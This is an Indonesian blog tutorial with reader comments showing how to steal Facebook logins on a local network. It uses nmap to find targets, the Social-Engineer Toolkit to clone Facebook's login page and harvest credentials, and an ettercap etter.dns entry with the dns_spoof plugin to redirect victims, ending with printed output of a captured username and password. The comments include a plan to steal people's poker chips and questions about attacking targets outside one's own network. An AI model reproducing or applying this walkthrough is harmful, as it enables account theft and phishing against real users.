Hal pertama yang harus dilakukan adalah mengumpulkan informasi. Hal ini pernah saya jelaskan di sini.
Preparation:
- Ettercap-NG
- Social Engineering Toolkit
Note:
- Matikan web server apache dengan menggunakan perintah:
root@bt5r1:~# nmap 172.16.129.1/24
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-25 14:17 WIT
Nmap scan report for 172.16.129.1
Host is up (0.0000070s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
902/tcp open iss-realsecure
Nmap scan report for 172.16.129.129
Host is up (0.00070s latency).
Not shown: 993 filtered ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
554/tcp open rtsp
2869/tcp open icslap
5357/tcp open wsdapi
10243/tcp open unknown
MAC Address: 00:0C:29:71:E6:CF (VMware)
Nmap scan report for 172.16.129.254
Host is up (0.000066s latency).
All 1000 scanned ports on 172.16.129.254 are filtered
MAC Address: 00:50:56:EE:EB:39 (VMware)
Nmap done: 256 IP addresses (3 hosts up) scanned in 10.88 seconds
Screenshot:
Setelah mengetahui targetnya, maka kita siapkan web phishing-nya dengan menggunakan SET. Berikut modulnya:
root@bt5r1:~# cd /pentest/exploits/set/
root@bt5r1:/pentest/exploits/set# ./set
[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
[---] Development Team: JR DePre (pr1me) [---]
[---] Development Team: Joey Furr (j0fer) [---]
[---] Version: 2.1 [---]
[---] Codename: 'Rebirth' [---]
[---] Report bugs: davek@social-engineer.org [---]
[---] Follow me on Twitter: dave_rel1k [---]
[---] Homepage: http://www.secmaniac.com [---]
Welcome to the Social-Engineer Toolkit (SET). Your one
stop shop for all of your social-engineering needs..
DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com.
Join us on irc.freenode.net in channel #setoolkit
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1
[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
[---] Development Team: JR DePre (pr1me) [---]
[---] Development Team: Joey Furr (j0fer) [---]
[---] Version: 2.1 [---]
[---] Codename: 'Rebirth' [---]
[---] Report bugs: davek@social-engineer.org [---]
[---] Follow me on Twitter: dave_rel1k [---]
[---] Homepage: http://www.secmaniac.com [---]
Welcome to the Social-Engineer Toolkit (SET). Your one
stop shop for all of your social-engineering needs..
DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com.
Join us on irc.freenode.net in channel #setoolkit
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) Third Party Modules
99) Return back to the main menu.
set> 2
The Web Attack module is a unique way of utilizing multiple web-based attacks
in order to compromise the intended victim.
The Java Applet Attack method will spoof a Java Certificate and deliver a
metasploit based payload. Uses a customized java applet created by Thomas
Werth to deliver the payload.
The Metasploit Browser Exploit method will utilize select Metasploit
browser exploits through an iframe and deliver a Metasploit payload.
[snip...]
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Man Left in the Middle Attack Method
6) Web Jacking Attack Method
7) Multi-Attack Web Method
8) Create or import a CodeSigning Certificate
99) Return to Main Menu
set:webattack>6
The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
set:webattack>2
Setelah ini maka web phishing hampir selesai, yang harus kita lakukan adalah menentukan apa yang ingin kita curi dari korban. Misalkan ingin mencuri akun facebook, maka modulnya seperti berikut:
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:www.facebook.com
[*] Cloning the website: https://login.facebook.com/login.php
[*] This could take a little bit...
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] I have read the above message. [*]
Press {return} to continue.
[*] Web Jacking Attack Vector is Enabled...Victim needs to click the link.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
Dengan begini web phishing telah siap. Kita hanya tinggal menunggu korban mengklik link di atas yang tercetak warna ungu, yaitu: https://login.facebook.com/login.php atau bisa juga korban harus menuju link kita yaitu: 172.16.129.1. Hmmm, rasanya sulit sekali jika kita harus menunggu korban menuju link itu. Kita gunakan DNS spoof, agar korban selalu menuju IP kita ketika dia akan mengakses www.facebook.com. Modul:
root@bt5r1:~# nano /usr/share/ettercap/etter.dns
Lalu tambahkan baris ini di bawah:
www.facebook.com A 172.16.129.1
Ini akan membuat korban selalu di-spoof ke 172.16.129.1 ketika ingin mengakses www.facebook.com. Setelah itu, lakukan modul ini untuk mengaktifkan dns_spoof:
root@bt5r1:~# ettercap -i vmnet8 -T -q -P dns_spoof // //
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on vmnet8... (Ethernet)
vmnet8 -> 00:50:56:C0:00:08 172.16.129.1 255.255.255.0
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %
2 hosts added to the hosts list...
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
Activating dns_spoof plugin...
Screenshot:
Setelah ini maka persiapan sudah 100%. Kita hanya tinggal menunggu korban mengakses halaman kita. Lihat screenshot ketika Windows tidak spoofed saat mengakses Google:
Dan lihat ketika korban spoofed ketika mengakses www.facebook.com ke halaman phishing SET. Berikut report dari ettercap:
dns_spoof: [www.facebook.com] spoofed to [172.16.129.1]
Screenshot:
Lihat halaman phishing yang dibuat oleh SET yang sama persis dengan yang sebenarnya, hanya saja URL-nya berbeda:
Dan lihat ketika user memasukan Username dan Sandinya:
Report dari SET:
[*] Information will be displayed to you as it arrives below:
172.16.129.129 - - [25/Oct/2011 14:25:12] "GET / HTTP/1.1" 200 -
10.76.80.63 - - [25/Oct/2011 14:26:24] "GET /index2.html HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: charset_test=€,´,€,´,æ°´,Д,Є
PARAM: lsd=
PARAM: return_session=0
PARAM: legacy_return=1
PARAM: display=
PARAM: session_key_only=0
PARAM: trynum=1
PARAM: charset_test=€,´,€,´,æ°´,Д,Є
PARAM: lsd=
POSSIBLE USERNAME FIELD FOUND: email=doubledragon
POSSIBLE PASSWORD FIELD FOUND: pass=doubledragon
PARAM: persistent=1
PARAM: default_persistent=0
POSSIBLE USERNAME FIELD FOUND: login=Masuk
[*] WHEN YOUR FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
^C[*] File exported to reports/2011-10-25 14:28:14.508234.html for your reading pleasure...
[*] File in XML format exported to reports/2011-10-25 14:28:14.508234.xml for your reading pleasure...
Press {return} to return to the menu.
Screenshot:
Sekian tutorial kali ini, semoga bermanfaat (=
Blue Dragon
masukin perintahnya dimana ya?
ReplyDeleteKERENNNNNN BOSSSSSSSSSSSSSSSSS................... PRAKTEK LANGSUNG>>> NGAMBILIN CHIP2 POKER ORANG..hahahahaha
ReplyDeletewah good , tp kok waktu ane ngegunain exploit yg itu di set , ane masuk url asli fb kok msh fb ya,pdhl udah di spoof,ltrus ane masukin ip ane baru kebuka halaman dialihkan,gmna ya ..
ReplyDeletejika victim sudah login lebih dulu ke facebook.spertinya cara ini tidak berpengaruh lagi gan. ada solusinya gan
ReplyDeleteane berhasil dengan metode ini gan, tapi yang ane tanyakan, jika facebook yang akan dihack bukan satu jaringan tapi sudah ada target tersendiri yang brada diluar jaringan kita bagaimana gan
ReplyDeleteterima kasih